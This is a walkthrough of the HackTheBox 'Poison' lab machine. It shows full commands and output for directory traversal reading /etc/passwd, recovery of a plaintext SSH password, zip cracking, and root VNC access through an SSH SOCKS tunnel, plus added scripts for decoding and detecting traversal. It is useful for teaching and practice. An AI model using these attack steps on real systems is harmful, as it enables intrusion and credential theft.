Enumeration Stage
Service/Port Scan
NMAP (network mapper)
A full-range nmap scan reveals two open ports: 22 (OpenSSH 7.2 on FreeBSD) and 80 (Apache httpd 2.4.29 on FreeBSD with PHP/5.6.32, an end-of-life PHP branch).
$ nmap -sV -sC -p- -oN poison.txt 10.10.10.84
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 06:00 EDT
Nmap scan report for 10.10.10.84
Host is up (0.049s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Web Application
Overview
We are greeted by a temporary website that is used to test some local scripts. So, let’s test them 🙂

Functionalities test
I am going to test each functionality for hints, security gaps and so on. While poking the application I discovered a password backup file via listfiles.php and a directory traversal vector in the file= parameter of browse.php.
# curl http://10.10.10.84/browse.php?file=listfiles.php
Array
(
[0] => .
[1] => ..
[2] => browse.php
[3] => index.php
[4] => info.php
[5] => ini.php
[6] => listfiles.php
[7] => phpinfo.php
[8] => pwdbackup.txt
)
# curl http://10.10.10.84/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=
The blob is not encrypted, only base64-encoded 13 times over. A short bash loop that runs base64 -d thirteen times unwraps it to:
Charix!2#4%6&8(0
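The decoding loop, as an added example that is not the script from the original post. It builds a constructed 13-layer blob from a demo secret so it runs offline, and the decoder keeps calling base64 -d until the output is no longer valid base64 (the real plaintext stops it because characters such as ! and # are outside the base64 alphabet), so it does not depend on trusting the "13 times" hint in the file:

```shell
#!/bin/sh
# Added example (not from the write-up): peel nested base64 layers until base64 -d rejects the input.
# The demo secret and blob below are constructed here; feed the real pwdbackup.txt line to decode_layers
# to reproduce the write-up's result.

# encode_layers SECRET N: wrap SECRET in N layers of base64, mimicking how pwdbackup.txt was produced.
encode_layers() {
  data=$1
  i=0
  while [ "$i" -lt "$2" ]; do
    data=$(printf '%s' "$data" | base64)   # base64 wraps at 76 columns; embedded newlines are fine
    i=$((i + 1))
  done
  printf '%s' "$data"
}

# decode_layers BLOB: decode repeatedly while `base64 -d` accepts the input.
# The plaintext ends up in DECODED and the number of layers peeled in LAYERS
# (globals rather than stdout, so the caller also learns how deep the nesting was).
decode_layers() {
  DECODED=$1
  LAYERS=0
  while next=$(printf '%s' "$DECODED" | base64 -d 2>/dev/null); do
    DECODED=$next
    LAYERS=$((LAYERS + 1))
  done
}

# Constructed demo secret; any plaintext containing a non-base64 character stops the loop the same way.
DEMO_SECRET='Demo!pass#123'
BLOB=$(encode_layers "$DEMO_SECRET" 13)
decode_layers "$BLOB"
printf 'layers peeled: %s\nplaintext: %s\n' "$LAYERS" "$DECODED"
```

To run it against the box, pass the last line of the curl output to decode_layers, for example `decode_layers "$(curl -s 'http://10.10.10.84/browse.php?file=pwdbackup.txt' | tail -n 1)"`; LAYERS then tells you whether the file's "13 times" claim was honest.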
browse.php reads whatever path it is handed in the file parameter without restricting it to the web root. That is a classic directory traversal: prefixing enough ../ sequences walks out of the document root and exposes any file the www user can read.

The command below dumps /etc/passwd, which lists every local account. On FreeBSD the password field shows * because the hashes live in master.passwd, but the names and shells are enough: apart from root and toor, charix is the only account with a real login shell (/bin/csh); everything else is a system account set to nologin.
$ curl http://10.10.10.84/browse.php?file=../../../../../../../../../../../../etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
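From the defender's side, the same traversal is easy to spot in the web server's access log. The following is an added example, not part of the original write-up: the log lines are constructed to look like Apache's common log format (they are not captured from the box), and the filter normalises URL encoding before matching so that %2e%2e%2f and double-encoded %252e variants are caught alongside the plain ../ form used above.

```shell
#!/bin/sh
# Added example (not from the write-up): flag directory-traversal requests in Apache-style access logs.
# SAMPLE_LOG is constructed for this demo; two of the four requests carry traversal payloads.
SAMPLE_LOG='10.10.14.2 - - [14/May/2021:13:36:22 +0000] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 312
10.10.14.2 - - [14/May/2021:13:36:40 +0000] "GET /browse.php?file=../../../../etc/passwd HTTP/1.1" 200 2018
10.10.14.2 - - [14/May/2021:13:37:05 +0000] "GET /browse.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2018
10.10.14.2 - - [14/May/2021:13:37:30 +0000] "GET /index.php HTTP/1.1" 200 1005'

# normalise_path: undo one level of double encoding (%25 -> %), then decode the three
# characters that matter for traversal: %2e ".", %2f "/", %5c "\".
# Applying this before the regex means encoded and plain payloads hit the same rule.
normalise_path() {
  sed -e 's/%25/%/g' -e 's/%2[eE]/./g' -e 's/%2[fF]/\//g' -e 's/%5[cC]/\\/g'
}

# traversal_hits: print (decoded) log lines that contain a parent-directory step, "../" or "..\".
traversal_hits() {
  normalise_path | grep -E '\.\.(/|\\)'
}

# count_traversal_hits: number of matching lines, handy for a quick triage or an alert threshold.
count_traversal_hits() {
  traversal_hits | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | traversal_hits
```

Pipe a real log through it with `traversal_hits < /var/log/httpd-access.log`; the decoded output also makes the attacker's target path readable at a glance.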
A valid username from /etc/passwd and a recovered password from pwdbackup.txt: time to try them over SSH.
Privilege Escalation
Foothold
# ssh charix@10.10.10.84
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
...[snip]...
charix@Poison:~ %
Enumeration – Files/Writeable/SUID
The home directory holds a password-protected zip file. To crack it offline I started a Python HTTP server in charix's home directory and pulled the archive to my Kali machine.
charix@Poison:~ % ls
secret secret.zip user.txt
charix@Poison:~ % unzip secret.zip
Archive: secret.zip
extracting: secret
unzip: Passphrase required for this entry
charix@Poison:~ % python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.14.2 - - [14/May/2021 13:36:22] "GET /secret.zip HTTP/1.1" 200 -
Cracking Secret
Cracking the password-protected archive proved frustrating (four wordlists, no hit) until I realised I had never tried reusing charix's own password. That was the zip password.
# zip2john secret.zip > passtocrack.hash
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827
┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/english.txt' secret.zip
┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/realhuman_phill.txt' secret.zip
┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' secret.zip
┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/fasttrack.txt' secret.zip
┌──(root💀kali)-[/home/kali]
└─# unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
password incorrect--reenter:
extracting: secret
The extracted file is eight bytes of binary with no readable content. That size is telling: a VNC password file is exactly one DES block, the (at most eight-character) password obfuscated with VNC's fixed key. Since somebody bothered to zip and password-protect it, it is very likely the "secret" to something we have not found yet.
┌──(root💀kali)-[/home/kali]
└─# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
# hexdump -C secret
00000000 bd a8 5b 7c d5 96 7a 21 |..[|..z!|
00000008
Process Enumeration
Process enumeration turns up an interesting process: Xvnc, the X server of TightVNC (a Virtual Network Computing server used for remote desktop access). It runs as root and listens on 5901 (VNC display :1) and 5801 (TightVNC's built-in HTTP server for the Java viewer, hence the -httpd flag). Both sockets are bound to 127.0.0.1 only, which is why the nmap scan never saw them.
charix@Poison:~ % ps aux
....[snip]....
root 529 0.0 0.9 23620 8872 v0- S 11:45 0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/cla
....[snip]...
charix@Poison:~ % sockstat -l | grep Xvnc
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
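Root-owned services bound only to loopback are the ones worth hunting for during post-exploitation, because the external port scan cannot see them and they are often less hardened. The following is an added example that is not part of the original write-up: an awk filter over sockstat -l style output that keeps only root-owned TCP sockets on a loopback address. The sample lines are constructed to resemble the output above and are not captured from the box.

```shell
#!/bin/sh
# Added example (not from the write-up): list root-owned TCP listeners that are bound to loopback only.
# SAMPLE_SOCKSTAT is constructed to look like FreeBSD `sockstat -l` output, including the header line.
SAMPLE_SOCKSTAT='USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     sshd       620   4  tcp4   *:22                  *:*
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
www      httpd      631   4  tcp4   *:80                  *:*
charix   sshd       700   6  tcp4   127.0.0.1:6010        *:*'

# loopback_root_listeners: print COMMAND and LOCAL ADDRESS for sockets that are owned by root,
# use TCP (tcp4 or tcp6), and are bound to 127.x.x.x or ::1. Unix sockets (PROTO "stream")
# and wildcard binds (*:port, already visible from outside) are skipped.
loopback_root_listeners() {
  awk '$1 == "root" && $5 ~ /^tcp/ && ($6 ~ /^127\./ || $6 ~ /^\[?::1\]?:/) { print $2, $6 }'
}

# count_loopback_root_listeners: how many such sockets there are, useful as a quick triage number.
count_loopback_root_listeners() {
  loopback_root_listeners | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_SOCKSTAT" | loopback_root_listeners
```

On the box itself the equivalent is `sockstat -l | loopback_root_listeners`; on Linux hosts the same idea works over `ss -ltnp` output once the field positions are adjusted.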
Accessing the VNC
Because Xvnc only listens on 127.0.0.1, the connection has to originate on the box. The plan: check which local port proxychains expects, start an SSH session to Poison with -D on that port so SSH acts as a SOCKS proxy, then run vncviewer through proxychains so its connection to 127.0.0.1:5901 is made from Poison's side of the tunnel. The -passwd option takes the unzipped VNC password file, not a passphrase, which is why the eight-byte "secret" file is enough.
┌──(root💀kali)-[/home/kali]
└─# cat /etc/proxychains4.conf
...[snip]...
socks4 127.0.0.1 9050
...[snip]...
┌──(root💀kali)-[/home/kali]
└─# ssh charix@10.10.10.84 -D 9050
Password for charix@Poison:
charix@Poison:~ %
┌──(root💀kali)-[/home/kali]
└─# proxychains vncviewer 127.0.0.1:5901 -passwd secret

And that is root on the VNC session. A nice box: the owner exposed test scripts that introduced a file read primitive, reused the same password for the account and the archive, and stored a root-level VNC credential in the user's home directory. To sum up, we covered SSH tunnelling with a SOCKS proxy and proxychains, directory traversal, password reuse, and Xvnc running as root on loopback.